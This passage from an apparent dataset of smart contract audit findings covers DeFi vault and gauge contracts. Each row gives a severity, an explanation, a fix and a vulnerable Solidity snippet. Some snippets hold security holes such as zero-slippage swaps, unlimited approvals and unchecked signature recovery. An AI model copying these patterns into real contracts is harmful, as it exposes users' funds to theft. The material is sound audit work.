curve pools,\\n // When getting total position value -> its calculated based on virtual price\\n // During withdrawal -> calc\\_withdraw\\_one\\_coin() is used to get an actual estimate of ETH received if we were to remove liquidity\\n // The following checks account for this\\n uint256 totalLpBalanceInETH = 
useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(totalLpBalance)\\n : \\_lpTokenValueInETH(totalLpBalance);\\n\\n lpTokenBalance = useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(lpTokenBalanceRaw)\\n : \\_lpTokenValueInETH(lpTokenBalanceRaw);\\n\\n stakedLpBalance = totalLpBalanceInETH - lpTokenBalance;\\n ethBalance = address(this).balance;\\n}\\n```\\n\\nThis function includes ETH balance, LP balance, and staked balance. But WETH balance is not included here. WETH tokens are initially transferred to the contract, and before the withdrawal, the contract also stores WETH.",Include WETH balance into the `totalFunds`.,,"```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n" +LyraPositionHandlerL2 inaccurate modifier onlyAuthorized may lead to funds loss if keeper is compromised,medium,"The `LyraPositionHandlerL2` contract is operated either by the L2 keeper or by the L1 `LyraPositionHandler` via the `L2CrossDomainMessenger`. This is implemented through the `onlyAuthorized` modifier:\\n```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n ""ONLY\\_AUTHORIZED""\\n );\\n \\_;\\n}\\n```\\n\\nThis is set on:\\n`withdraw()`\\n`openPosition()`\\n`closePosition()`\\n`setSlippage()`\\n`deposit()`\\n`sweep()`\\n`setSocketRegistry()`\\n`setKeeper()`\\nFunctions 1-3 have a corresponding implementation on the L1 `LyraPositionHandler`, so they could indeed be called by it with the right parameters. However, 4-8 do not have an implemented way to call them from L1, and this modifier creates an unnecessarily expanded list of authorised entities that can call them.\\nAdditionally, even if their implementation is provided, it needs to be done carefully because `msg.sender` in their case is going to end up being the `L2CrossDomainMessenger`. 
For example, the `sweep()` function sends any specified token to `msg.sender`, with the intention likely being that the recipient is under the team's or the governance's control - yet, it will be `L2CrossDomainMessenger` and the tokens will likely be lost forever instead.\\nOn the other hand, the `setKeeper()` function would need a way to be called by something other than the keeper because it is intended to change the keeper itself. In the event that the access to the L2 keeper is compromised, and the L1 `LyraPositionHandler` has no way to call `setKeeper()` on the `LyraPositionHandlerL2`, the whole contract and its funds will be compromised as well. So, there needs to be some way to at least call the `setKeeper()` by something other than the keeper to ensure security of the funds on L2.\\n```\\nfunction closePosition(bool toSettle) public override onlyAuthorized {\\n LyraController.\\_closePosition(toSettle);\\n UniswapV3Controller.\\_estimateAndSwap(\\n false,\\n LyraController.sUSD.balanceOf(address(this))\\n );\\n}\\n\\n/\\*///////////////////////////////////////////////////////////////\\n MAINTAINANCE FUNCTIONS\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/// @notice Sweep tokens\\n/// @param \\_token Address of the token to sweepr\\nfunction sweep(address \\_token) public override onlyAuthorized {\\n IERC20(\\_token).transfer(\\n msg.sender,\\n IERC20(\\_token).balanceOf(address(this))\\n );\\n}\\n\\n/// @notice socket registry setter\\n/// @param \\_socketRegistry new address of socket registry\\nfunction setSocketRegistry(address \\_socketRegistry) public onlyAuthorized {\\n socketRegistry = \\_socketRegistry;\\n}\\n\\n/// @notice keeper setter\\n/// @param \\_keeper new keeper address\\nfunction setKeeper(address \\_keeper) public onlyAuthorized {\\n keeper = \\_keeper;\\n}\\n```\\n","Create an additional modifier for functions intended to be called just by the keeper (onlyKeeper) such as functions 4-7, and create an 
additional modifier `onlyGovernance` for the `setKeeper()` function. As an example, the L1 `Vault` contract also has a `setKeeper()` function that has a `onlyGovernance()` modifier. Please note that this will likely require implementing a function for the system's governance that can call `LyraPositionHandlerL2.setKeeper()` via the `L2CrossDomainMessenger`.",,"```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n ""ONLY\\_AUTHORIZED""\\n );\\n \\_;\\n}\\n```\\n" +Harvester.harvest swaps have no slippage parameters,medium,"As part of the vault strategy, all reward tokens for staking in the Convex ETH-stETH pool are claimed and swapped into ETH. The swaps for these tokens are done with no slippage at the moment, i.e. the expected output amount for all of them is given as 0.\\nIn particular, one reward token that is most susceptible to slippage is LDO, and its swap is implemented through the Uniswap router:\\n```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n\\nThe swap is called with `amountOutMinimum: 0`, meaning that there is no slippage protection in this swap. This could result in a significant loss of yield from this reward as MEV bots could “sandwich” this swap by manipulating the price before this transaction and immediately reversing their action after the transaction, profiting at the expense of our swap. 
Moreover, the Uniswap pools seem to have low liquidity for the LDO token as opposed to Balancer or Sushiswap, further magnifying slippage issues and susceptibility to frontrunning.\\nThe other two tokens - CVX and CRV - are being swapped through their Curve pools, which have higher liquidity and are less susceptible to slippage. Nonetheless, MEV strategies have been getting more advanced and calling these swaps with 0 as expected output may place these transactions in danger of being frontrun and “sandwiched” as well.\\n```\\nif (cvxBalance > 0) {\\n cvxeth.exchange(1, 0, cvxBalance, 0, false);\\n}\\n// swap CRV to WETH\\nif (crvBalance > 0) {\\n crveth.exchange(1, 0, crvBalance, 0, false);\\n}\\n```\\n\\nIn these calls `.exchange` , the last `0` is the `min_dy` argument in the Curve pools swap functions that represents the minimum expected amount of tokens received after the swap, which is `0` in our case.",Introduce some slippage parameters into the swaps.,,"```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n" +Harvester.rewardTokens doesn't account for LDO tokens,medium,"As part of the vault's strategy, the reward tokens for participating in Curve's ETH-stETH pool and Convex staking are claimed and swapped for ETH. This is done by having the `ConvexPositionHandler` contract call the reward claims API from Convex via `baseRewardPool.getReward()`, which transfers the reward tokens to the handler's address. 
Then, the tokens are iterated through and sent to the harvester to be swapped from `ConvexPositionHandler` by getting their list from `harvester.rewardTokens()` and calling `harvester.harvest()`\\n```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n\\nHowever, `harvester.rewardTokens()` doesn't have the LDO token's address in its list, so they will not be transferred to the harvester to be swapped.\\n```\\nfunction rewardTokens() external pure override returns (address[] memory) {\\n address[] memory rewards = new address[](2);\\n rewards[0] = address(crv);\\n rewards[1] = address(cvx);\\n return rewards;\\n}\\n```\\n\\nAs a result, `harvester.harvest()` will not be able to execute its `_swapLidoForWETH()` function since its `ldoBalance` will be 0. This results in missed rewards and therefore yield for the vault as part of its normal flow.\\nThere is a possible mitigation in the current state of the contract that would require governance to call `sweep()` on the LDO balance from the `BaseTradeExecutor` contract (that `ConvexPositionHandler` inherits) and then transferring those LDO tokens to the harvester contract to perform the swap at a later rewards claim. 
This, however, requires transactions separate from the intended flow of the system as well as governance intervention.",Add the LDO token address to the `rewardTokens()` function by adding the following line `rewards[2] = address(ldo);`,,"```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n" +Keeper design complexity,medium,"The current design of the protocol relies on the keeper being operated correctly in a complex manner. Since the offchain code for the keeper wasn't in scope of this audit, the following is a commentary on the complexity of the keeper operations in the context of the contracts. Keeper logic such as the order of operations and function argument parameters with log querying are some examples where if the keeper doesn't execute them correctly, there may be inconsistencies and issues with accounting of vault shares and vault funds resulting in unexpected behaviour. While it may represent little risk or issues to the current Brahma-fi team as the vault is recently live, the keeper logic and exact steps should be well documented so that public keepers (if and when they are enabled) can execute the logic securely and future iterations of the vault code can account for any intricacies of the keeper logic.\\n1. Order of operations: Convex rewards & new depositors profiting at the expense of old depositors' yielded reward tokens. As part of the vault's strategy, the depositors' ETH is provided to Curve and the LP tokens are staked in Convex, which yield rewards such as CRV, CVX, and LDO tokens. 
As new depositors provide their ETH, the vault shares minted for their deposits will be less compared to old deposits as they account for the increasing value of LP tokens staked in these pools. In other words, if the first depositor provides 1 ETH, then when a new depositor provides 1 ETH much later, the new depositor will get less shares back as the `totalVaultFunds()` will increase:\\n```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n\\n```\\nfunction totalVaultFunds() public view returns (uint256) {\\n return\\n IERC20(wantToken).balanceOf(address(this)) + totalExecutorFunds();\\n}\\n```\\n\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\nHowever, this does not account for the reward tokens yielded throughout that time. From the smart contract logic alone, there is no requirement to first execute the reward token harvest. It is up to the keeper to execute `ConvexTradeExecutor.claimRewards` in order to claim and swap their rewards into ETH, which only then will be included into the yield in the above `ConvexPositionHandler.positionInWantToken` function. If this is not done prior to processing new deposits and minting new shares, new depositors would unfairly benefit from the reward tokens' yield that was generated before they deposited but accounted for in the vault funds only after they deposited.\\n2. 
Order of operations: closing Lyra options before processing new deposits.\\nThe other part of the vault's strategy is utilising the yield from Convex to purchase options from Lyra on Optimism. While Lyra options are risky and can become worthless in the event of bad trades, only yield is used for them, therefore keeping user deposits' initial value safe. However, their value could also yield significant returns, increasing the overall funds of the vault. Just as with `ConvexTradeExecutor`, `LyraTradeExecutor` also has a `totalFunds()` function that feeds into the vault's `totalVaultFunds()` function. In Lyra's case, however, it is a manually set value by the keeper that is supposed to represent the value of Lyra L2 options:\\n```\\nfunction totalFunds()\\n public\\n view\\n override\\n returns (uint256 posValue, uint256 lastUpdatedBlock)\\n{\\n return (\\n positionInWantToken.posValue +\\n IERC20(vaultWantToken()).balanceOf(address(this)),\\n positionInWantToken.lastUpdatedBlock\\n );\\n}\\n```\\n\\n```\\nfunction setPosValue(uint256 \\_posValue) public onlyKeeper {\\n LyraPositionHandler.\\_setPosValue(\\_posValue);\\n}\\n```\\n\\n```\\nfunction \\_setPosValue(uint256 \\_posValue) internal {\\n positionInWantToken.posValue = \\_posValue;\\n positionInWantToken.lastUpdatedBlock = block.number;\\n}\\n```\\n\\nSolely from the smart contract logic, there is a possibility that a user deposits when Lyra options are valued high, meaning the total vault funds are high as well, thus decreasing the amount of shares the user would have received if it weren't for the Lyra options' value. 
Consequently, if after the deposit the Lyra options become worthless, decreasing the total vault funds, the user's newly minted shares will now represent less than what they have deposited.\\nWhile this is not currently mitigated by smart contract logic, it may be worked around by the keeper first settling and closing all Lyra options and transferring all their yielded value in ETH, if any, to the Convex trade executor. Only then the keeper would process new deposits and mint new shares. This order of operations is critical to maintain the vault's intended safe strategy of maintaining the user's deposited value, and is dependent entirely on the keeper offchain logic.\\n3. Order of operations: additional trade executors and their specific management Similarly to the above examples, as more trade executors and position handlers are added to the vault, the complexity for the keeper will go up significantly, requiring it to maintain all correct orders of operations not just to keep the shares and funds accounting intact, but simply for the trade executors to function normally. For example, in the case of Lyra, the keepers need to manually call `confirmDeposit` and `confirmWithdraw` to update their `depositStatus` and `withdrawalStatus` respectively to continue normal operations or otherwise new deposits and withdrawals wouldn't be processed. On the other hand, the Convex executor does it automatically. Due to the system design, there may be no single standard way to handle a trade executor. New executors may also require specific calls to be done manually, increasing overall complexity keeper logic to support the system.\\n4. Keeper calls & arguments: depositFunds/batchDeposit and initiateWithdrawal/batchWithdraw `userAddresses[]` array + gas overhead With the current gated approach and batching for deposits and withdrawals to and from the vault, users aren't able to directly mint and redeem their vault shares. 
Instead, they interact with the `Batcher` contract that then communicates with the `Vault` contract with the help of the keeper. However, while each user's deposit and withdrawal amounts are registered in the contract state variables such as `depositLedger[user]` and `withdrawLedger[user]`, and there is an event emitted with the user address and their action, to process them the keeper is required to keep track of all the user addresses in the batch they need to process. In particular, the keeper needs to provide `address[] memory users` for both `batchDeposit()` and `batchWithdraw()` functions that communicate with the vault. There is no stored list of users within the contract that could provide or verify the right users, so it is entirely up to the keeper's offchain logic to query the logs and retrieve the addresses required. Therefore, depending on the size of the `address[] memory users` array, the keepers may need to consider the transaction gas limit, possibly requiring splitting the array up and doing several transactions to process all of them. In addition, in the event of withdrawals, the keepers need to calculate how much of the `wantToken` (WETH in our case) will be required to process the withdrawals, and call `withdrawFromExecutor()` with that amount to provide enough assets to cover withdrawals from the vault.\\n5. Timing: 50 block radius for updates on trade executors that need to have their values updated via a call Some trade executors, like the Convex one, can retrieve their funds value at any time from Layer 1, thereby always being up to date with the current block. Others, like the Lyra trade executor, require the keeper to update their position value by initiating a call, which also updates their `positionInWantToken.lastUpdatedBlock` state variable. 
However, this variable is also called during the `vault.totalVaultFunds()` call during deposits and withdrawals via `totalExecutorFunds()`, which eventually calls `areFundsUpdated(blockUpdated)`. This is a check to ensure that the current transaction's `block.number <= _blockUpdated + BLOCK_LIMIT`, where BLOCK_LIMIT=50 blocks, i.e. roughly 12-15 min. As a result, keepers need to make sure that all executors that require a call for this have their position values updated before, and rather close to, processing deposits or withdrawals, or `areFundsUpdated()` will revert those calls.","Document the exact order of operations, steps, necessary logs and parameters that keepers need to keep track of in order for the vault strategy to succeed.",,```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n +Approving MAX_UINT amount of ERC20 tokens,low,"Approving the maximum value of uint256 is a known practice to save gas. However, this pattern was proven to increase the impact of an attack many times in the past, in case the approved contract gets hacked.\\n```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n\\n```\\nIERC20(vaultInfo.tokenAddress).approve(vaultAddress, type(uint256).max);\\n```\\n\\n```\\nIERC20(LP\\_TOKEN).safeApprove(ETH\\_STETH\\_POOL, type(uint256).max);\\n\\n// Approve max LP tokens to convex booster\\nIERC20(LP\\_TOKEN).safeApprove(\\n address(CONVEX\\_BOOSTER),\\n type(uint256).max\\n);\\n```\\n\\n```\\ncrv.safeApprove(address(crveth), type(uint256).max);\\n// max approve CVX to CVX/ETH pool on curve\\ncvx.safeApprove(address(cvxeth), type(uint256).max);\\n// max approve LDO to uniswap swap router\\nldo.safeApprove(address(uniswapRouter), type(uint256).max);\\n```\\n\\n```\\nIERC20(wantTokenL2).safeApprove(\\n address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n// approve max susd balance to uniV3 router\\nLyraController.sUSD.safeApprove(\\n
address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n```\\n","Consider approving the exact amount that's needed to be transferred, or alternatively, add an external function that allows the revocation of approvals.",,"```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n" +Batcher.depositFunds may allow for more deposits than vaultInfo.maxAmount,low,"As part of a gradual rollout strategy, the Brahma-fi system of contracts has a limit of how much can be deposited into the protocol. This is implemented through the `Batcher` contract that allows users to deposit into it and keep the amount they have deposited in the `depositLedger[recipient]` state variable. In order to cap how much is deposited, the user's input `amountIn` is evaluated within the following statement:\\n```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n ""MAX\\_LIMIT\\_EXCEEDED""\\n);\\n```\\n\\nHowever, while `pendingDeposit`, `amountIn`, and `vaultInfo.maxAmount` are denominated in the vault asset token (WETH in our case), `IERC20(vaultInfo.vaultAddress).totalSupply()` and `pendingWithdrawal` represent vault shares tokens, creating potential mismatches in this evaluation.\\nAs the yield brings in more and more funds to the vault, the amount of share minted for each token deposited in decreases, so `totalSupply()` becomes less than the total deposited amount (not just vault funds) as the strategy succeeds over time. For example, at first `X` deposited tokens would mint `X` shares. After some time, this would create additional funds in the vault through yield, and another `X` deposit of tokens would mint less than `X` shares, say `X-Y`, where `Y` is some number greater than 0 representing the difference in the number of shares minted. So, while there were `2*X` deposited tokens, `totalSupply()=(2*X-Y)` shares would have been minted in total. 
However, at the time of the next deposit, a user's `amountIn` will be added with `totalSupply()=(2*X-Y)` number of shares instead of a greater `2*X` number of deposited tokens. So, this will undershoot the actual amount of tokens deposited after this user's deposit, thus potentially evaluating it less than `maxAmount`, and letting more user deposits get inside the vault than what was intended.",Consider either documenting this potential discrepancy or keeping track of all deposits in a state variable and using that inside the `require` statement..,,"```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n ""MAX\\_LIMIT\\_EXCEEDED""\\n);\\n```\\n" +BaseTradeExecutor.confirmDeposit | confirmWithdraw - Violation of the “checks-effects-interactions” pattern,low,"Both `confirmDeposit, confirmWithdraw` might be re-entered by the keeper (in case it is a contract), in case the derived contract allows the execution of untrusted code.\\n```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, ""DEPOSIT\\_COMPLETED"");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n\\n```\\nfunction confirmWithdraw() public override onlyKeeper {\\n require(withdrawalStatus.inProcess, ""WIHDRW\\_COMPLETED"");\\n \\_confirmWithdraw();\\n withdrawalStatus.inProcess = false;\\n}\\n```\\n","Although the impact is very limited, it is recommended to implement the “checks-effects-interactions” in both functions.",,"```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, ""DEPOSIT\\_COMPLETED"");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n" +Reactivated gauges can't queue up rewards,high,"Active gauges as set in `ERC20Gauges.addGauge()` function by authorised users get their rewards queued up in the `FlywheelGaugeRewards._queueRewards()` function. 
As part of it, their associated struct `QueuedRewards` updates its `storedCycle` value to the cycle in which they get queued up:\\n```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n\\nHowever, these gauges may be deactivated in `ERC20Gauges.removeGauge()`, and they will now be ignored in either `FlywheelGaugeRewards.queueRewardsForCycle()` or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()` because both use `gaugeToken.gauges()` to get the set of gauges for which to queue up rewards for the cycle, and that only gives active gauges. Therefore, any updates `FlywheelGaugeRewards` makes to its state will not be done to deactivated gauges' `QueuedRewards` structs. In particular, the `gaugeCycle` contract state variable will keep advancing throughout its cycles, while `QueuedRewards.storedCycle` will retain its previously set value, which is the cycle where it was queued and not 0.\\nOnce reactivated later with at least 1 full cycle being done without it, it will produce issues. It will now be returned by `gaugeToken.gauges()` to be processed in either FlywheelGaugeRewards.queueRewardsForCycle()or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()`, but, once the reactivated gauge is passed to `_queueRewards()`, it will fail an assert:\\n```\\nassert(queuedRewards.storedCycle == 0 || queuedRewards.storedCycle >= lastCycle);\\n```\\n\\nThis is because it already has a set value from the cycle it was processed in previously (i.e. 
storedCycle>0), and, since that cycle is at least 1 full cycle behind the state contract, it will also not pass the second condition `queuedRewards.storedCycle >= lastCycle`.\\nThe result is that this gauge is locked out of queuing up for rewards because `queuedRewards.storedCycle` is only synchronised with the contract's cycle later in `_queueRewards()` which will now always fail for this gauge.","Account for the reactivated gauges that previously went through the rewards queue process, such as introducing a separate flow for newly activated gauges. However, any changes such as removing the above mentioned `assert()` should be carefully validated for other downstream logic that may use the `QueuedRewards.storedCycle` value. Therefore, it is recommended to review the state transitions as opposed to only passing this specific check.",,"```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n" +Reactivated gauges have incorrect accounting for the last cycle's rewards,medium,"As described in https://github.com/ConsenSysDiligence/fei-labs-audit-2022-04/issues/3, reactivated gauges that previously had queued up rewards have a mismatch between their `storedCycle` and contract's `gaugeCycle` state variable.\\nDue to this mismatch, there is also a resulting issue with the accounting logic for its completed rewards:\\n```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n\\nConsequently, this then produces an incorrect value for QueuedRewards.priorCycleRewards:\\n```\\npriorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n```\\n\\nAs now `completedRewards` will be equal to 0 instead of the previous cycle's rewards for that gauge. 
This may cause a loss of rewards accounted for this gauge as this value is later used in `getAccruedRewards()`.","Consider changing the logic of the check so that `storedCycle` values further in the past than `lastCycle` may produce the right rewards return for this expression, such as using `<=` instead of `==` and adding an explicit check for `storedCycle` `==` 0 to account for the initial scenario.",,```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n +Lack of input validation in delegateBySig,low,"```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, ""ERC20MultiVotes: signature expired"");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n ""\\x19\\x01"",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, ""ERC20MultiVotes: invalid nonce"");\\n \\_delegate(signer, delegatee);\\n}\\n```\\n",Introduce a zero address check i.e `require signer!=address(0)` and check if the recovered signer is an expected address. 
Refer to ERC20's permit for inspiration.,,"```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, ""ERC20MultiVotes: signature expired"");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n ""\\x19\\x01"",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, ""ERC20MultiVotes: invalid nonce"");\\n \\_delegate(signer, delegatee);\\n}\\n```\\n" +Decreasing maxGauges does not account for users' previous gauge list size.,low,"`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. 
If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.","Either document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.",,"```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n" +Decrementing a gauge by 0 that is not in the user gauge list will fail an assert.,low,"`ERC20Gauges._decrementGaugeWeight` has an edge case scenario where a user can attempt to decrement a `gauge` that is not in the user `gauge` list by 0 `weight`, which would trigger a failure in an assert.\\n```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n\\nAs `_decrementGaugeWeight`, `decrementGauge`, or `decrementGauges` don't explicitly check that a `gauge` belongs to the user, the contract logic continues with its operations in `_decrementGaugeWeight` for any gauges passed to it. 
In general this is fine because if a user tries to decrement non-zero `weight` from a `gauge` they have no allocation to, thus getting `getUserGaugeWeight[user][gauge]=0`, there would be a revert due to a negative value being passed to `getUserGaugeWeight[user][gauge]`\\n```\\nuint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\ngetUserGaugeWeight[user][gauge] = oldWeight - weight;\\n```\\n\\nHowever, passing a `weight=0` parameter with a `gauge` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (oldWeight == weight)`, which would also succeed since both are 0, to finally reach an assert that will verify a remove of that `gauge` from the user `gauge` list. However, it will fail since it was never there in the first place.\\n```\\nassert(\\_userGauges[user].remove(gauge));\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail.",Replace `assert()` with a `require()` or verify that the gauge belongs to the user prior to performing any operations.,,"```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n" +Undelegating 0 votes from an address who is not a delegate of a user will fail an assert.,low,"Similar scenario with issue 5.5. 
`ERC20MultiVotes._undelegate` has an edge case scenario where a user can attempt to undelegate from a `delegatee` that is not in the user delegates list by 0 `amount`, which would trigger a failure in an assert.\\n```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n\\nAs `_undelegate`, or `undelegate` don't explicitly check that a `delegatee` belongs to the user, the contract logic continues with its operations in `_undelegate` for the `delegatee` passed to it. In general this is fine because if a user tries to `undelegate` non-zero `amount` from a `delegatee` they have no votes delegated to, thus getting `_delegatesVotesCount[delegator][delegatee]=0`, there would be a revert due to a negative value being passed to `uint256 newDelegates`\\n```\\nuint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n```\\n\\nHowever, passing a `amount=0` parameter with a `delegatee` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (newDelegates == 0)`, which would succeed, to finally reach an assert that will verify a remove of that `delegatee` from the user delegates list. 
However, it will fail since it was never there in the first place.\\n```\\nassert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail, as per the dev comment in that line “// Should never fail”.",Replace `assert()` with a `require()` or verify that the delegatee belongs to the user prior to performing any operations.,,"```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n" +xTRIBE.emitVotingBalances - DelegateVotesChanged event can be emitted by anyone,medium,"`xTRIBE.emitVotingBalances` is an external function without authentication constraints. It means anyone can call it and emit `DelegateVotesChanged` which may impact other layers of code that rely on these events.\\n```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, 